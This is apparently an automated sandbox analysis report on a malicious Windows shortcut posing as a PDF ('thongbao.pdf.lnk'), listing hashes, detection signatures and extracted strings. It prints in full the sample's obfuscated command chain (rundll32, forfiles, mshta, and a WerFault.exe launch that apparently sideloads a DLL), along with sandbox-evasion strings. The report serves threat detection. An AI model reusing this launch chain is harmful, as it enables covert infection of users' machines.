Windows Analysis Report
p3a3TSUccX.lnk

Overview

General Information

Sample name: p3a3TSUccX.lnk
renamed because original name is a hash value
Original sample name: 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60.lnk
Analysis ID: 1500949
MD5: 54f4610b378845315fb6dbae629cd97c
SHA1: 59e38278a7f81438fe075789706a2b7e0b49184f
SHA256: 6b8be94da26dafffea2d0cafaeaa36dd96faced23d76c8bcd218b1efd1273e60
Tags: lnk

Detection

MalLnk
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
AI detected suspicious sample
Obfuscated command line found
Sigma detected: Suspicious Parent Double Extension File Execution
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: p3a3TSUccX.lnk ReversingLabs: Detection: 21%
Source: p3a3TSUccX.lnk Virustotal: Detection: 34%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 81.0% probability
Source: Binary string: C:\Users\user\NetHood\nts\My Music\bols\winload_prod.pdb\RX_INSTALL\_locales\pl\\\mp\che\pState\pps_{9a386491-5394-47a0-a408-e4e3a9d60139}\GQN2WC\e\v3\202914\S0\-47d0-8459-969652988747}\b-48ad6d679b24}\as_featuremanagement\-2dc7c298a033}\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WerFault.pdb source: p3a3TSUccX.lnk
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\W source: forfiles.exe, 00000003.00000002.1430977906.000001951A529000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx6 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 09-53-40-267.log4 source: forfiles.exe, 00000003.00000003.1247961489.000001951A55D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: forfiles.exe, 00000003.00000002.1431020526.000001951A54A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A560000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\CHU-TUAN-KIET\source\doan\Loader2_DLL\Release\faultrep.pdb source: p3a3TSUccX.lnk
Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*. source: forfiles.exe, 00000003.00000003.1258926347.000001951A571000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000003.00000003.1261729966.000001951A571000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: forfiles.exe, 00000003.00000002.1431020526.000001951A55C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WerFault.pdbGCTL source: p3a3TSUccX.lnk
Source: p3a3TSUccX.lnk String found in binary or memory: (www.facebook.com/Thich.Hoc.Chui/)Tj equals www.facebook.com (Facebook)
Source: p3a3TSUccX.lnk String found in binary or memory: /kTextE [/t (www.facebook.com/Thich.Hoc.Chui/)] equals www.facebook.com (Facebook)

System Summary

Source: Yara match File source: p3a3TSUccX.lnk, type: SAMPLE
Source: p3a3TSUccX.lnk LNK file: $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P %USERPROFILE% /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "%USERPROFILE%\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "%USERPROFILE%\IAMHERE.alf")) && m^s^h^t^a"."exe "%USERPROFILE%\IAMHERE.alf" && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (timeout 5 && (if not exist "%APPDATA%\Lenovo\faultrep.dll" (exit) else (start /min "" "%APPDATA%\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "%APPDATA%\Lenovo\WerFault.exe")))
Source: p3a3TSUccX.lnk Binary or memory string: OriginalFilenameWerFault.exej% vs p3a3TSUccX.lnk
Source: p3a3TSUccX.lnk Binary string: o%XApplication Error%sInPageCoFireInPageError%s\system32\cofire.exe"%s" "%s" "%s"\Device\LanmanRedirector\%s :psapi.dllGetMappedFileNameWsfc_os.dllSfcIsFileProtectedFindFirstFileNameWFindNextFileNameWwdi.dll)n3Lgg
Source: p3a3TSUccX.lnk Binary string: \\?\GLOBALROOT\Device\Mup\0000da39a3ee5e6b4b0d3255bfef95601890afd80709%04d/%02d/%02d:%02d:%02d:%02dU:!W:dc.xpmoddatadc.xpmodminidc.xpmodmemdc.OnDemandKdmpdc.expmoddatadc.expmodminidc.expmodmemdc.CustomDumpdc.xpminidumpdc.xpmemdumpdc.noreflectdc.forcenativedumpttd.tmpNoReflectionAbandoning reflection due to server requestAttempting to reflect reporting process!Reflection/ReserveMachineQueueDirectory attempt failed: 0X%XReflection attempt failed: 0X%XFalling back to non-reflected dump for reflection requestAttempting to cross-proc reporting process!Open process failed unexpectedly: 0X%XOut of cross process pid spaceelevatednon-elevatedfullReserveMachineQueueDirectory failed: 0x%xKernelDump failed: 0x%xCollectCrossProcessModuleDumps failed: 0x%xCollectCrossProcessDumps failed: 0x%xTTD recording not allowed: 0x%xControl Time Travel Debugging failed: 0x%xCould not collect xproc for reflection: 0x%x.dmpCould not collect dump for reflection cross process: 0x%xtruefalseCollectReflectionDump failed with: 0x%xCould not collect dump for cross process: 0x%xCould not collect cross dump for loaded module %ws: 0x%xFound %u native processes for xproc module: %sFound %u x86 processes for xproc module: %sTTD\
Source: p3a3TSUccX.lnk Binary string: t\Device\IPTSYSTEM\CurrentControlSet\Control\WMI\Autologger\Microsoft-OCA-IPTBufferSize{C712AF3D-ED1E-46A9-B843-E9014D29CAEE}LogFileModeMinimumBuffersEnableKernelFlagsStatusStartapi-ms-win-eventing-controller-l1-1-0.dllStartTraceWMicrosoft-OCA-IPTWIN://SYSAPPIDonecore\shell\lib\calleridentity\calleridentity.cppN%\
Source: classification engine Classification label: mal84.troj.evad.winLNK@4/0@0/0
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\forfiles.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\forfiles.exe forfiles /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf""
Source: C:\Windows\System32\forfiles.exe Section loaded: version.dll

Data Obfuscation

Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\windows\System32\cmd.exe" $r$u$n$d$l$l$3$2 $S$he$ll$3$2$.dll $$S$h$e$l$l$E$x$e$c_R$un$D$L$L "cmd" /c (( if not exist "thongbao.pdf.lnk" (f^o^r^fi^les /P C:\Users\user /S /M "thongbao.pdf.lnk" /C "cmd /c copy "@path" "C:\Users\user\IAMHERE.alf"") else (copy "%CD%\thongbao.pdf.lnk" "C:\Users\user\IAMHERE.alf")) && m^s^h^t^a"."exe "C:\Users\user\IAMHERE.alf" && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (timeout 5 && (if not exist "C:\Users\user\AppData\Roaming\Lenovo\faultrep.dll" (exit) else (start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))else (timeout 1 && start /min "" "C:\Users\user\AppData\Roaming\Lenovo\WerFault.exe")))

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe

Malware Analysis System Evasion

Source: p3a3TSUccX.lnk Binary or memory string: INFOWERPINITIATECRASHREPORTING WAS MEOMEO!AESCHAININGMODECBCCHAININGMODEOBJECTLENGTHTCPVIEW.EXEWIRESHARK.EXEFIDDLER.EXEVIRTUALBOX.EXEPROCEXP.EXEAUTOIT.EXECONFIRMEDCHECK SIZE: %LU BYTESMY_PAYLOAD_LENERRORFAILED TO ALLOCATE MEMORYFAILED TO SET MEMORY PROTECTION[-] SANDBOX PROCESS DETECTED![+] DECRYPTING SC...
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
No contacted IP infos